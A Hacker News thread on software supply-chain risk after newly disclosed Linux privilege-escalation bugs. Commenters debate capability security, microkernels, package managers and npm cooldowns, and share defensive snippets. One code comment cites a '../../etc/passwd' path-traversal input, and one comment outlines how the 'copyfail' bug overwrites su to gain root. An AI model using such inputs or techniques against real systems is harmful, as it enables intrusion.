          We are not in disagreement here. I'm not blaming AI, I'm blaming the culture around its use.

      • tclancy 16 hours ago

        >What we are seeing so far come out of the AI agent era is reduced not increased code quality.

        I am not disagreeing in the main, but I wonder about the net effect. Again, this is total speculation on my part. If I vibe-slop a half dozen apps this week (and I might, just you watch), the overall raw code quality in the universe gets worse. But if in the same span of time two major security holes got patched (assume no net change in the amount of code), didn't things actually get better?

  • josephg a day ago

    I've been wanting a capability based security model for years. Argued about it here in fact. Capabilities are kind of an object pointer with associated permissions - like a unix file descriptor.

    We should have:

    - OS level capabilities. Launched programs get passed a capability token from the shell (or wherever you launched the program from). All syscalls take a capability as the first argument. So, "open path /foo" becomes open(cap, "/foo"). The capability could correspond to a fake filesystem, real branch of your filesystem, network filesystem or really anything. The program doesn't get to know what kind of sandbox it lives inside.

    - Library / language capabilities. When I pull in some 3rd party library - like an npm module - that library should be passed a capability too, either at import time or per call site. It shouldn't have read/write access to all other bytes in my program's address space. It shouldn't have access to do anything on my computer as if it were me! The question is: "What is the blast radius of this code?" If the library you're using is malicious or vulnerable, we need to have sane defaults for how much damage can be caused. Calling lib::add(1, 2) shouldn't be able to result in a persistent compromise of my entire computer.

    SeL4 has fast, efficient OS-level capabilities. It's had them for years. They work great. They're fast - faster than Linux in many cases. And tremendously useful. They allow for transparent sandboxing, userland drivers, IPC, security improvements, and more. You can even run Linux as a process in SeL4. I want an OS that has all the features of my Linux desktop, but works like SeL4.

    Unfortunately, I don't think any programming language has the kind of language-level capabilities I want. Rust is really close. We need a way to restrict a 3rd party crate from calling any unsafe code (including from untrusted dependencies). We need to fix the long-standing soundness bugs in Rust. And we need a capability-based standard library. No more global open() / listen() / etc. Only openat(), and equivalents for all other parts of the OS.
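
    For a taste of what that standard library could look like, Rust's cap-std crate already models directory handles as capabilities; a minimal sketch (paths hypothetical, error handling kept simple):

        use cap_std::ambient_authority;
        use cap_std::fs::Dir;
        use std::io::Read;

        fn main() -> std::io::Result<()> {
            // The one deliberate use of ambient authority: turning a path into a capability.
            let data = Dir::open_ambient_dir("/var/app-data", ambient_authority())?;

            // Code holding `data` can only reach files beneath it; there is no
            // global open(), and paths like "../../etc/passwd" are rejected.
            let mut file = data.open("config.txt")?;
            let mut contents = String::new();
            file.read_to_string(&mut contents)?;
            println!("{contents}");
            Ok(())
        }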

    If LLMs keep getting better, I'm going to get an LLM to build all this stuff in a few years if nobody else does it first. Security on modern desktop operating systems is a joke.

    • mike_hearn a day ago

      Capabilities have a lot of serious design problems which is why no mainstream language has them. Because this comes up so often on HN I wrote an essay explaining the issues here:

      https://blog.plan99.net/why-not-capability-languages-a8e6cbd...

      But as pointed out by others, this particular exploit wouldn't be stopped by capabilities. Nor would it be stopped by micro-kernels. The filesystem is a trusted entity on any OS design I'm familiar with as it's what holds the core metadata about what components have what permissions. If you can exploit the filesystem code, you can trivially obtain any permission. That the code runs outside of the CPU's supervisor mode means nothing.

      The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.

      • josephg 21 hours ago

        > I wrote an essay explaining the issues here

        This essay only addresses my second point - capabilities within a program. It doesn't address OS level capabilities at all.

        But even in the space of programming languages, I find this essay extremely unconvincing. Like, you raise points like this:

        > Here are some problems you’ll have to solve in order to sandbox libraries: What is your threat model? How do you stop components tampering with each other’s memory?

        The threat model is left pad cryptolockering your computer via a supply chain attack. The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.

        You stop components tampering with each others' memory by using a memory safe language.

        > its main() method must be given a “god object” exposing all the ambient authorities the app begins with

        So what? The main function already takes arguments. I don't understand the problem.

        Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.

        Then there are these weird claims:

        > Any mutable global variable is a problem as it may allow one component to violate expectations held by another.

        You don't need to ban mutable global variables! Let's imagine we did this in safe Rust. I think the only constraint is that a global variable can't be shared over the boundary between crates. But nobody does that anyway. Even if you did share a global over a crate boundary, the child crate would still only be able to access it through methods on the type.

        Sneaky developers could leverage globals to violate the security boundary. But it would be hard to do by accident. Maybe just, don't do that.

        Your essay talks about some research project making a capability-based Java subset. And I understand that the resulting ergonomics weren't very good. But that isn't evidence that capabilities themselves are a bad idea. If a research student wrote a half-baked C compiler one time, you wouldn't take that as evidence that C compilers are a bad idea. I do, however, accept that the burden of proof is on me to demonstrate that it's a good idea. I hope that I can some day rise to that challenge.

        > The filesystem is a trusted entity on any OS design I'm familiar with

        That's not how capability-based microkernels like SeL4 work. The filesystem is owned by a specialised process. Other processes only modify files by sending messages to the filesystem process via a capability handle. If nobody created a writable file handle, the file can't be arbitrarily mutated by another module. Copyfail happened because in Linux, any code can by default interact with the page table; one piece of code was missing access control checks. In capability-based systems, it's basically impossible to accidentally forget access control checks like that.

        > The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.

        Copyfail is a logic bug. C#, Java or Kotlin wouldn't save you from it at all.

        • mike_hearn 20 hours ago

          The article talks about OS capabilities in the second part when it discusses Mojo, which is based on IPC.

          > The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.

          That requirement may seem clear right now, but the moment you talk to other people about your language you'll find there's no agreement on what "get hacked" means. Some people will consider calling exit(0) repeatedly to be "hacked" because it's a DoS attack, others will say no code execution or priv escalation happened, so that's not being hacked. Some will say that left-pad being able to read arbitrary bytes from your address space is being hacked, others will say no harm done and thus it wasn't being hacked. The details matter and you need to nail them down in advance.

          It turns out for example that one of the top uses of the Java SecurityManager was just to stop plugins accidentally calling System.exit() and tearing down the whole process. It wasn't even a security goal, really.

          > You stop components tampering with each others' memory by using a memory safe language.

          That's not enough. See languages like Ruby or JavaScript, which are memory safe but not sandboxable due to all the monkeypatching they allow.

          > Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.

          But almost nobody uses Haskell, partly because of poor ergonomics like this! So if you want a language that gets wide usage and has a good library ecosystem, monads for everything probably isn't going to take off.

          > If nobody created a writable file handle, the file can't be arbitrarily mutated by another module.

          We're talking about critical bugs in the filesystem, so what the FS process's idea of a file handle is doesn't really matter. If you can confuse or buffer-overflow the FS process by sending it messages, you can then edit state inside that process you weren't supposed to be able to access, and as that process controls the security system for everything, it's game over. Microkernels have no way to stop this, which is one reason very few operating systems move the core FS out into a separate process. You can't easily survive a crash of the core FS code, and it being exploited is equivalent to an exploit of the core microkernel anyway in terms of adversarial goals. So you might as well just run it in-kernel and reap the performance benefits.

          • tome 20 hours ago

            > > Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.

            > But almost nobody uses Haskell

            Sad, but true

            > partly because of poor ergonomics like this!

            I'm somewhat dubious that's the reason, partly because I find such ergonomics excellent! Especially those provided by my capability system Bluefin: https://hackage.haskell.org/package/bluefin

          • josephg 11 hours ago

            > We're talking about critical bugs in the filesystem so what the FS processes idea of a file handle is doesn't really matter.

            The copyfail bug wasn’t a bug in the filesystem code. It was a bug in the crypto algorithm code, which wrote to the filesystem page table without checking if the process invoking it had permission to write to the passed file handle. In a monolithic kernel like Linux, every subsystem can access the memory of every other subsystem by default. It’s up to each subsystem to be careful. As we keep discovering, “be really careful” is not a successful security strategy.

            A capability based OS like SeL4 is more secure. With SeL4, you would put the crypto algorithms and filesystem in separate user space processes. These processes would only communicate by RPC, by invoking capabilities. We can imagine how the copyfail scenario would play out: A user process has a capability representing its (read only) access to some privileged file on disk. It passes that capability to the crypto algorithm process. A bug - or even complete takeover - of the crypto algorithm process still doesn’t change that the file cap is read only. The crypto algorithm process doesn’t have direct access to the memory representing that file. It only has the read only file handle. All it can do with that handle is invoke it, which will only give it read access. Even with a bug in the crypto algorithms process, the OS would stay secure.

            Yes, capability OSes aren't a magic bullet. A bug in the filesystem process could still result in filesystem corruption. But better is better. OS capabilities provide defence in depth. They would have prevented copyfail.

            As far as I can tell, your argument against capabilities is that they might be slow. Some implementations have poor ergonomics. They don’t magically solve every possible security bug. You also, personally, used a bad implementation of capabilities this one time years ago in Java. Is that accurate?

            You must see how unconvincing I find your argument. What are you even trying to do? Convince people to not explore different ideas in computer science? When I close my eyes I see an old man yelling: “Hey you kids! What are you doing up there, trying new things? You stop that right now!”

          • jason_oster 3 hours ago

            > If you can confuse or buffer overflow the FS process by sending it messages, you can then edit state inside that process you weren't supposed to be able to access, and as that process controls the security system for everything it's game over.

            The assumption here is that the FS is the root of trust for the kernel. (A claim I consider dubious, but what do I know about knowing things?) It's another way to say that if you don't harden your root of trust, you're SOL. Which, ok, fair enough. But that's frankly irrelevant because hardening the root of trust is table stakes. The system cannot be secured without it, regardless of the threat model.

            All of the concerns about a definition of "getting hacked" fall out of ignoring the hardening of the root of trust. I don't wish to put words in your mouth, but my interpretation of the argument is essentially, "we can't have nice things because the root of trust cannot be hardened sufficiently to prevent all intrusions."

            Iff the FS is the root of trust, and it is not possible to confuse the FS by sending it messages, then there is no game over. You have a root of trust that cannot be broken.

            > Microkernels have no way to stop this, which is one reason very few operating systems move the core FS out into a separate process.

            My reading of the history reaches a very different conclusion. First, the primary reason that very few operating systems in practice use a microkernel design is because Linus Torvalds believed it was too slow for early 90's hardware [1]. And everyone else just does whatever Linux is doing.

            Second, security through surface area reduction (and more broadly, defense-in-depth) was always the point of the microkernel design [2]. Trivially, the principle of least privilege is how one arrives at a secure system. Monolithic kernels, to this very day, continue to prove that they cannot be secured in any practical manner. I can only assume we need things to get worse before kernel developers will tighten up and take security seriously.

            > So you might as well just run it in-kernel and reap the performance benefits.

            There's that same mentality again: "speed at all costs", the willful trading of security for performance. That position is just as flawed as trading essential liberty for temporary safety [3]. It doesn't matter how fast the thing is when the slightest bump always causes it to explode, killing everyone on board.

            [1]: https://web.archive.org/web/20040210002251/http://people.flu...

            [2]: https://www.cosy.sbg.ac.at/~clausen/PVSE2006/linus-rebuttal....

            [3]: https://old.reddit.com/r/todayilearned/comments/k0c8o6/til_b...

    • theamk a day ago

      Note that capabilities would not help for those bugs we are discussing today.

      Those exploits are in the kernel, and userspace is only making the normal, allowed calls. Replacing global open()/listen()/etc. with capability-based versions would still allow one to invoke the same kernel bugs.

      (Now, using a microkernel like seL4, where the kernel drivers are isolated, _would_ help, but (1) that's independent from what userspace does, you can have a POSIX layer with seL4, and (2) that would be way more context switches, so a performance drop)

      • josephg a day ago

        > Note that capabilities would not help for those bugs we are discussing today.

        Yes they would. Copyfail uses a bug in the linux kernel to write to arbitrary page table entries. A kernel like SeL4 puts the filesystem in a separate process. The kernel doesn't have a filesystem page table entry that it can corrupt.

        Even if the bug somehow got in, the exploit chain uses the page table bug to overwrite the code in su. This can be used to get root because su has suid set. In a capability based OS, there is no "su" process to exploit like this.

        A lot of these bugs seem to come from linux's monolithic nature meaning (complex code A) + (complex code B) leads to a bug. Microkernels make these sort of problems much harder to exploit because each component is small and easier to audit. And there's much bigger walls up between sections. Kernel ALG support wouldn't have raw access to overwrite page table entries in the first place.

        > (2) that would be may more context switches, so a performance drop

        I've heard this before. Is it actually true though? The SeL4 devs claim the context switching performance in sel4 is way better than it is in linux. There are only 11 syscalls - so optimising them is easier. Invoking a capability (like a file handle) in sel4 doesn't involve any complex scheduler lookups. Your process just hands your scheduler timeslice to the process on the other end of the invoked capability (like the filesystem driver).

        But SeL4 will probably have more TLB flushes. I'm not really sure how expensive they are on modern silicon.

        I'd love to see some real benchmarks doing heavy IO or something in linux and sel4. I'm not really sure how it would shake out.

    • grebc a day ago

      Have you heard of pledge in OpenBSD?

      I prefer its model of declaring what I want to use; any calls to code outside that error out.

      • josephg a day ago

        Yes. But it's nowhere near as powerful as capabilities.

        - Pledge requires the program drop privileges. Process level caps move the "allowed actions" outside of an application. And they can do that without the application even knowing. This would - for example - let you sandbox an untrusted binary.

        - Pledge still leaves an entire application in the same security zone. If your process needs network and disk access, every part of the process - including 3rd party libraries - gets access to the network and disk.

        - You can reproduce pledge with caps very easily. Capability libraries generally let you make a child capability. So, cap A has access to resources x, y, z. Make cap B with access to only resource x. You could use this (combined with a global "root cap" in your process) to implement pledge. You can't use pledge to make caps.

        • grebc a day ago

          I’m not trying to say use pledge/unveil to make capabilities, I’m saying use pledge/unveil to limit exposure.

          To me it’s easier to get a program to let the system know what it needs vs. try to contain it from the outside.

          Anyway, have a good one.

          • sroerick 19 hours ago

            There's an interesting distinction here where one approach is to build sandboxes that limit exposure, while the other is just allowing the program to be more secure.

            One approach is "Trust No Code" and the other is "Trusted code should run safely".

            The first one sounds better on paper, but leads to a very complicated system. That said, I haven't worked much with jails or other forms of sandboxing. It just seems to me that to make software function you need escape hatches, and the more of those you have, well, now you're back to plugging exploits with a more complicated system.

            It was interesting to me to hear that even though OpenBSD had designed their software to limit permissions even before pledge and unveil were released - upon release they found that a shocking amount of their software actually wasn't following their own rules.

            • grebc 14 hours ago

              I definitely lean to the “trusted code should run safely” because it’s just simpler in general.

              At what point do you trust the system? And if you don’t trust any of it what are you trying to accomplish?

              Re OpenBSD: I think it just shows we’re all human(fallible) at the end of the day :)

              • josephg 9 hours ago

                > Re OpenBSD: I think it just shows we’re all human(fallible) at the end of the day :)

                Yeah. Its yet another reminder that "being really careful" isn't an adequate security policy. Attackers only need to find 1 bug. Defenders need to protect everything. In large systems, you need defence in depth. Pledge? Yeah. NX? Yeah. Process isolation between subsystems? Yeah lets have that too. Static verification? Love it. Rust's borrow checker? Sure. We need it all.

  • c7b a day ago

    My pet theory is that package managers will one day be seen like we see object-oriented programming today. As something that was once popular but that we've since grown out of. It's also a design flaw that I see in cargo/Rust. Having to import 3rd party packages with who-knows-what dependencies to do pretty much anything, from using async to parsing JSON, it's supply chain vulnerability baked into the language philosophy. npm is no better, but I'm mentioning Rust specifically because it's an otherwise security-conscious language.

    • mike_hearn a day ago

      The industry hasn't grown out of OOP. Go look at any major production codebase businesses rely on and it's full of objects and classes, including new codebases made very recently.

      Package managers aren't going anywhere. Even languages that historically bet on large standard libraries have been giving up on that over time (e.g. Java's stdlib comes with XML support but not JSON).

      Unfortunately, LLMs are also not cheap enough to just create whole new PL ecosystems from scratch. So we have to focus on the lowest hanging fruits here. That means making sandboxing and containers far more available and easy for developers. Nobody should run "npm install" outside a sandbox.
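
      For instance, two cheap mitigations (a sketch, not a full sandbox; the node image tag is just an example):

          # stop npm lifecycle scripts (preinstall/postinstall) from running at all
          npm config set ignore-scripts true

          # or run the install in a throwaway container, so a malicious package
          # only sees the project directory rather than your home dir and keys
          docker run --rm -it -v "$PWD":/app -w /app node:22-alpine npm install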

      • c7b a day ago

        It's a condensed statement. There was a time when I would start a new programming project thinking about class hierarchies, maybe drawing some UML diagrams. I don't do that anymore, and I don't believe it's very common for greenfield projects anymore. But educate me if that's wrong. We've kept some of the good ideas from OOP like namespaces and interfaces and we use them in slightly different contexts now, where OOP may even still be technically possible, but it's not the primary way of doing things anymore. I believe, or at least hope, that we will see a similar kind of evolution for package managers. Where it's still possible to use other people's code, but having packages like left-pad or is-even is no longer how it's commonly being used, even if it may still technically be possible.

        • mike_hearn 20 hours ago

          I think that's normal, what universities teach as OOP is very different to what's actually done in the real world. But it was always that way. I learned OOP as a kid and UML didn't feature. Then at university it was taught in a very theoretical way. On the other hand things like encapsulation, inheritance etc are still widely used.

    • pjmlp a day ago

      Rust is quite bad on this; having to rely on external crates for error handling or macros is even worse than having to pick an async runtime.

      Yes, I mean crates like anyhow and syn.

      • kibwen 17 hours ago

        I'm all for including more things in the Rust standard library, but anyhow and syn are literally from a core Rust dev. It's not some left-pad rando, it's like a Linux user saying they don't trust the Git developer.

    • weregiraffe a day ago

      But you can't expect the language std to supply you with every package under the sun.

      • c7b a day ago

        I don't have an answer what the alternative is going to look like. But smarter people than me may find something. C/C++ are doing fine without package managers. Go at least has a more capable standard library than Rust. But I'm not sure if Go's import github approach is the answer.

        One idea I've been entertaining is to not allow transitive imports in packages. It would probably lead to far fewer and more capable packages, and a bigger standard library. Much harder to imagine a left-pad incident in such an ecosystem.

        • rounce a day ago

          > Go at least has a more capable standard library than Rust.

          Many Golang projects I see in the wild will import a number of dependencies with significant feature overlap with sections of the standard library, or even be intended as a replacement for them. So it seems that having an expansive stdlib isn’t sufficient to avoid deep dependency trees, it probably helps to some degree but it’s definitely not a panacea.

          • Measter a day ago

            That's not really that surprising when you think about it. Standard library-provided things are implemented on a basis of working OK for as many scenarios as possible, not on one of being the best possible implementation for every possible scenario.

        • kibwen 17 hours ago

          > C/C++ are doing fine without package managers.

          More or less the entire Debian apparatus is an organization devoted to being a C/C++ package manager, and while as an end-user it's adequate for installing applications it's still an enormous pain to use packages as libraries even with apt and friends. And once you get outside of apt, you're in an endless hellscape. People don't seem to understand that the real reason that people love Rust is not because of memory safety (let's be honest, most people are too short-sighted to care about that); it's because of Cargo.

          • skydhash 10 hours ago

            > it's still an enormous pain to use packages as libraries even with apt and friends. And once you get outside of apt, you're in an endless hellscape

            I strongly doubt that. Especially with tools like pkg-config that let you generate the set of flags for a package. If anything I've seen more horrendous build scripts from people that are trying to be clever and trying to support everything under the sun.
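
            For instance, building against a distro-installed library (libcurl here is an arbitrary example):

                # after `apt install libcurl4-openssl-dev`, pkg-config knows the flags
                pkg-config --cflags --libs libcurl

                # so a build against the system package is a one-liner
                cc main.c $(pkg-config --cflags --libs libcurl) -o main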

        • CJefferson 17 hours ago

          I think what we really need is better sandboxed languages. I’d be much happier if my compression algorithm only had an input stream and an output stream. Maybe my gui library shouldn’t have network access or filesystem access. It just draws what I give it, gives me back what users press. You could still make evil software in this world of course.

          • c7b 17 hours ago

            Sounds like functional programming could help with that?

        • uecker a day ago

          The solution exists, and those are curated package repositories as we have in Linux distributions. In C I can simply install a -dev package and use some library which sees some quality control and security updates from the distribution.

          The problem is that the UNIX shell model got very successful and is now also used on other platforms with poor package management, so all the language-level packaging system were created instead. But those did not learn from the lessons of Linux distributions. Cargo is particularly bad.

          • kibwen 17 hours ago

            > But those did not learn from the lessons of Linux distributions. Cargo is particularly bad.

            I recall a decade ago listening to native app developers lamenting how web pages were inferior to native apps and gnashing their teeth at why browsers wouldn't learn the lessons of native apps. It was, and remains, a shocking display of self-unawareness to fail to understand why web pages, despite doing many things worse than native apps, managed to blow native apps out of the water when it comes to doing the things that actually matter to users. This is how it feels listening to the above comment; you have failed to reflect on why both programming language authors and programming language users were pushed to using language-specific package managers in the first place, and you have failed to put forth any improvements to OS-level package managers that would allow them to address those underlying flaws.

          • marcus_holmes 21 hours ago

            TFA is literally talking about vulnerabilities in Linux packages. There are gajillions of them. Curated package repositories are not solving this problem.

            • MSFT_Edging 18 hours ago

              I think curated package repositories solve a problem, but not all of them.

              For example, I'm not sure if the world of windows freeware ever moved past this, but very often, the home page for a freeware package will look nearly identical to a page set up to deliver malware. Every package you download you wonder "is this the legit version?". Even push it further, there were multiple examples of sites that were previously trusted for software downloads(SourceForge and the installer debacle) that began packaging spyware or adware into downloads.

              With either delivery method, you're not quite safe from supply chain attacks, but with the curated repo, you at least have a single source of packages where you can trust it 99% of the time.

            • uecker 18 hours ago

              It talks about "installing software". You should definitely install updates from your Linux distribution and installing new packages from a curated repository is certainly not worse than having software already installed. Reducing the footprint is always a good idea though. Installing software from random uncurated sources is generally risky.

        • well_ackshually a day ago

          >C/C++ are doing fine without package managers.

          They're not doing fine either: every one of these projects contains a gigantic vendor/ folder full of unmaintained libraries, modified so much that keeping up with upstream is impossible, so they're stuck with whatever version they copied back in 2009.

          • jkercher a day ago

            You make that sound worse than it is. On the topic at hand, you have zero supply chain risk, and the whole thing is local. Also, your code from 2009 is still valid. That would be a foreign concept in some languages like Python.

            • baq a day ago

              you have your supply chain risk still, it's just frozen as of 2009 and whatever you vendored back then is as of today swiss cheese; also you'd better have the compiler suite vendored, too (as you should with this strategy).

              there's nothing stopping you from using python from 2009 except why would you want to do that to yourself - but the same strategy applies. the reference python implementation is written in C, after all.

        • pjmlp a day ago

          In C and C++'s case, the batteries included are POSIX + Khronos.

          • kibwen 17 hours ago

            In this analogy, the battery is the Leiden jar cobbled together by Benjamin Franklin in 1750. It's 2026, POSIX is unfit for purpose.

      • foresto a day ago

        A stdlib doesn't have to provide everything under the sun in order to be helpful here.

        Languages with rich standard libraries provide enough common components that it's feasible to build things using only a small handful of external dependencies. Each of those can be carefully chosen, monitored, and potentially even audited, by an individual or small team.

        That doesn't make the resulting software exploit-proof, of course, but it seems to me much less risky than an ecosystem where most programs pull in hundreds of dependencies, all of which receive far less scrutiny than a language's standard library.

  • dguest a day ago

    Most people will avoid sticking things in their mouth by default. They don't wait for the microbial cultures to come back positive to say no.

    We need a cultural shift toward code hygiene, which isn't really any different from the norms most cultures develop around food. It's a mix of crude heuristics but the sense of "eeew" is keeping billions of people alive.

    • noduerme a day ago

      The billions of burgers served by fast food franchises with long histories of poisoning people would argue that delicious convenience overrides the hygiene instinct.

      Which is to say: Hiding the sausage-making is a core aspect of what makes supply chains profitable.

    • xboxnolifes a day ago

      > They don't wait for the microbial cultures to come back positive to say no.

      They don't wait for the cultures to come back negative to say yes either. They just eat what they are served.

      • dguest a day ago

        Exactly! They rely on heuristics, like the fact that they're being served in a clean public restaurant which is presumably following health code, and is staffed by people who follow standard norms of hygiene. In some countries the norm is for the kitchen to be visible so the patrons can take a peek themselves.

        If the restaurant has a foul smell and the food is served by a twitchy waiter who insists that the food is totally free, I think most people will think twice.

    • yxhuvud a day ago

      Most people start out as kids who do exactly that.

      • 1718627440 a day ago

        And for exactly that reason, kids do not get to decide what food to buy and prefer.

    • oever a day ago

      That means going back to disabling Javascript or only allowing widely used, well-maintained Javascript libraries.

      • mschuster91 a day ago

        > or only allowing widely used, well-maintained Javascript libraries.

        That isn't a guarantee either, just last month someone compromised the Axios library.

        • skydhash a day ago

          They stole the axios npm keys and uploaded malicious artifacts. They did not take over the axios repo. The issue is with packaging and distribution, not with the code.

          • pocksuppet 21 hours ago

            What's the meaningful distinction between those two things? You imported axios, you got pwned. Same result either way.

            • skydhash 21 hours ago

              Because of the way npm works, as soon as a developer key is stolen, a lot of people get pwned. The key is the only barrier.

              Compare that with the average distro. You would have to compromise the developer's infrastructure (repo or website), publish a new version without them noticing, and then convince the distro maintainer that it's OK to merge the new package script into the distro repo. Hard to pull off in high-profile projects.
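
              (For what it's worth, recent npm can at least verify artifacts after the fact; a minimal sketch:)

                  # verify registry signatures and provenance attestations
                  # for everything in node_modules
                  npm audit signatures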

  • larodi a day ago

    Indeed - a year ago we floated the idea that it's better to write your own code if you can than to pull in third parties. But at the time it was heresy to consider LLMs filling the gaps.

    Today I’m limiting my exposure to dependencies more than ever, particularly for things that take a few hundred lines to implement. It’s a paradigm shift, no less.

    • orbital-decay a day ago

      This replaces supply chain trust with the trust in the LLM and the provider you're using. Even if you exclude model devs from your threat model and are running the LLM yourself, it's still an uninterpretable black box that is trained on the web data which can be and is manipulated precisely to attack LLMs during training. So this approach still needs proper supply chain security.

      • larodi a day ago

        Well, it does, particularly if you use an adversarial model tuned to inject malware. Not sure it's been researched to that degree, and no provider would tell you anyway, I guess :)

    • noduerme a day ago

      There are a lot of libs you really can't justify implementing from scratch. Mathjs and node-mysql jump to mind. Poisoned chains build up from small dependencies, and clearly staying on top of your dependency chain should be a full time job - if anyone was willing to pay someone to do that full time.

      • larodi a day ago

        Of course, and thank God for them. But many libraries are more complicated and serve more use cases than you typically need. Like: how much of ffmpeg do you need? Well, depends on the project. And perhaps someone is happily tearing it down with an LLM to get precisely those parts (not me, though I enjoy doing it to LLMs and other models).

        But being able to have agents reimplement perl5 in Rust and make it faster and more secure raises many questions about the role of open source and the consequences for security and supply chain risk.

  • sergeykish a day ago

    Web pages are handled by browsers. A Linux desktop running code without a sandbox is reckless; it relies on verification by distro maintainers, which stops working the moment users run proprietary software.

    Programming language packages are only an issue because we don't have zero trust for modules: no restrictions on opening sockets or the file system. The issue is not the count; a pure leftPad function can't hurt you.

  • Animats 13 hours ago

    > The sheer mass of packages

    Yes.

    I just noticed that a Rust program I'm working on had acquired a plotter driver crate. A plotter driver? The program has no graphical output.

    Turns out that "kdtree" has a dev dependency on a profiling library that pulls in a whole graphics system. Even in release mode, I get that, because I have debug symbols turned on, which activated dev dependencies.
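
    For anyone wanting to audit their own tree, cargo can show where a surprise crate comes from; a sketch, assuming the crate in question is `plotters`:

        # who pulls this crate in? (-i inverts the tree)
        cargo tree -i plotters

        # view the graph without dev-dependencies, i.e. what actually ships
        cargo tree --edges no-dev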

    Aargh.

    • endospore 13 hours ago

      > I have debug symbols turned on, which activated dev dependencies

      Nope that doesn't happen. It's not compiled into your binary if it's a dev or build dependency. Cargo may have downloaded the crate source according to the lockfile and that's it, it shouldn't build anything unneeded.

  • rerdavies a day ago

    I am feeling really uncomfortable sitting on a large React project.

    Whether to do constant npm upgrades to keep the high-priority security issues count at zero (for what seems like about 15 minutes), or whether to hang back a bit to avoid catching the big one that everyone knows is coming real soon now.

    Not enjoying npm at all.

  • JulienBrouchier 20 hours ago

    There are positive things happening too. Recently, npm released min-release-age filtering that lets you only install packages of a certain vintage, protecting you from these supply chain attacks, since they tend to be detected quickly.

    https://github.com/npm/cli/releases/tag/v11.10.0
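
    On top of that, npm's long-standing `--before` flag gives a similar cooldown effect by hand; a sketch, assuming GNU date:

        # only consider package versions published at least 7 days ago
        npm install --before="$(date -d '7 days ago' --iso-8601=seconds)"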

  • bulbar a day ago

    Realistically, most folks don't get paid to mitigate long term risks by deviation from the common (and more efficient) practice.

    Big companies have security roles on multiple levels, enforcing policies and not allowing devs to just install any package. That's not new but started maybe 15 years ago.

  • emodendroket a day ago

    Right, yeah, instead you can run ancient versions of everything and encounter a whole different class of risks

  • Joeri 17 hours ago

    Blaming the victim is too easy. NPM is unsafe at any speed. You cannot use it in any but the most trivial capacities without opening yourself up to supply chain attacks.

    Why is npm the only package ecosystem that has so many problems? What are the other package system owners doing better? Let’s start there, instead of blaming the victims.

  • amelius a day ago

    lim (num_packages_in_system -> inf) p(successful_supply_chain_attack) = 1

  • anthk 18 hours ago

    This never happened under CPAN/CTAN.

    This wasn't a nightmare waiting to happen, but an example of badly maintained systems built for the lowest common denominator.

  • chasil a day ago

    I am so happy to go through another round of kernel RPMs after the freak out today!

    I have one server that has shell users, and I did the "yum update" and "reboot -f" dance last week.

    Was that good enough? Oh no.

    Here we go again!

    • baq a day ago

      Fortunately the issue isn’t fixed yet, so you don’t have to :)

  • j45 a day ago

    Folks might have to start reconsidering server-side technologies a bit, or at least being more mindful of build processes.

    • marcus_holmes a day ago

      It's not just client-side npm though. Rust has the same problem.

      Edit: and, ofc, what we're discussing here is Linux packages.

CriticalRegion a day ago

This is a baffling take. These exploits are local privilege escalations for Linux systems. They'll allow an attacker with a foothold in a shared environment, or with low-privilege access to a system, to affect the rest of the system. They aren't RCEs and won't let attackers access environments that they couldn't before, other than in the shared-hosting scenarios. That is absolutely not how most supply chain attacks are carried out. Most supply chain attacks are performed via credential theft and social engineering. The more sophisticated ones are APT-style attacks like the SolarWinds one (which were carried out by organisations that would already have exploits like these) or more creative stuff like the Shai-Hulud fiasco. All of these options existed before these LPEs. If you're worried about supply chain attacks, you've been worried for longer than Mythos has been out. Not updating your software is never good security advice.

  • AntiUSAbah a day ago

    The supply chain attack in this case would be injecting the exploit via a CI/CD system and escalating the local user who runs the npm code to root.

    The proper response, from them and from you, should be to make sure there's some isolation between user space and root, like gVisor.

  • Phelinofist a day ago

    Either my reading of your comment is wrong or you misunderstood OP's supply chain comment, I think: what they mean is that a supply chain attack that gets the exploit onto a system would be especially effective right now, because the reported vulns are unfixed pretty much everywhere.

    • CriticalRegion a day ago

      No, you read it right. I just misunderstood the post's message as "these exploits will enable more supply chain attacks". I'll probably delete my comment since it's debating a strawman. It is absolutely right that these exploits might enable these attacks to have a larger impact. I still don't think that I agree with the message since a malicious npm package already installed can get its payloads from a C2 server, it doesn't need an npm update.

      • Phelinofist 18 hours ago

        > since a malicious npm package already installed can get its payloads from a C2 server, it doesn't need an npm update

        In general I agree, but I think these two vulns are 0day-y and pretty much every major distro is affected AFAIU, so there is perhaps slightly more potential than usual

  • throawayonthe a day ago

    yeah but i mean installing an npm package in a container is giving it low privilege access

  • traderj0e 16 hours ago

    Well it does say "install" new software, as in run code locally

0xbadcafebee a day ago

"Wait a week to install software" does not work. Just a few months ago a massive exploit hit the web, which was a timed attack which sat for more than a month before executing. If everyone starts waiting a week, their exploits will wait 2 weeks. Cyber criminals do not need to exploit you immediately, they just need to exploit you. (It also doesn't change a large range of vuln classes like typosquatting)

  • tom_alexander a day ago

    I think the author was suggesting "wait a week" as a one-time wait for fixes to be written and patches distributed for these specific prematurely-disclosed vulnerabilities, not an on-going suggestion for delaying all updates. But otherwise I agree with you.

  • moebrowne a day ago

    > If everyone starts waiting a week, their exploits will wait 2 weeks

    It's much easier to break into an NPM/Github account and push malicious commits in the few hours a maintainer is sleeping than it is to push something out and not have it noticed for 2 weeks.

    There are lists of attacks which had an exposure window which was much shorter than 2 weeks:

    https://daniakash.com/posts/simplest-supply-chain-defense/ https://blog.yossarian.net/2025/11/21/We-should-all-be-using...

  • gpm a day ago

    I think you misunderstood the article. The proposal isn't to wait a week after software has been published before installing it. It's: for the next seven days, starting now, just don't, because you probably don't have patches for these vulnerabilities, and even if you do there are probably more scary vulnerabilities about to be discovered.

    • hnfong a day ago

      I think it's even more specific.

      From TFA:

      > Right now would be one of the best times for a supply chain attack via NPM to hit hard.

      Given the local kernel root exploits, people pulling npm dependencies have an extra high chance of getting rooted. This includes test systems, build systems, the web server running node.js backend, etc. etc. etc.

